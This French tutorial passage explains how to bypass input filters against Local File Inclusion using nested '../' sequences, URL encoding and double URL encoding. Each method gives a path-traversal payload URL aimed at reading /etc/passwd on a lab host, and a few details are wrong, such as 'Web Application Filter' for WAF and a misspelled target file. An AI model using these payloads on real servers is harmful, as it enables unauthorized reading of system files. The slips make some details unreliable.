Les développeurs ayant conscience des risques de LFI peuvent ajouter des fonctions qui vont filtrer les entrées.
Ils vont supprimer les ../ et les / dans le nom du fichier
Ce genre de filtre s'appelle un Waf : Web Application Filter.

Il est possible de contourner ces filtres de plusieures manières:

• En prévoyant que des suites de caractères seront filtrés: ..././ une fois filtré va donner ../
  http://10.10.10.11/index.php?page=..././..././..././..././passwd
  
  
• En utilisant un encodage url:
  ../ devient %2e%2e%2f
  / devient %2f
  http://10.10.10.11/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
  
  
  
• En utilisant un double encodage url:
  ../ devient %2e%2e%2f qui lui même devient %252e%252e%252f
  / devient %252f
  http://10.10.10.11/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpassword
  
  Même si généralement les navigateurs ne ralent pas trop, ils peuvent interpréter les caractères encodés voire les réencoder. Il est souvent préférable de modifier l'URL dans une command curl ou un proxy plutôt que dans le navigateur.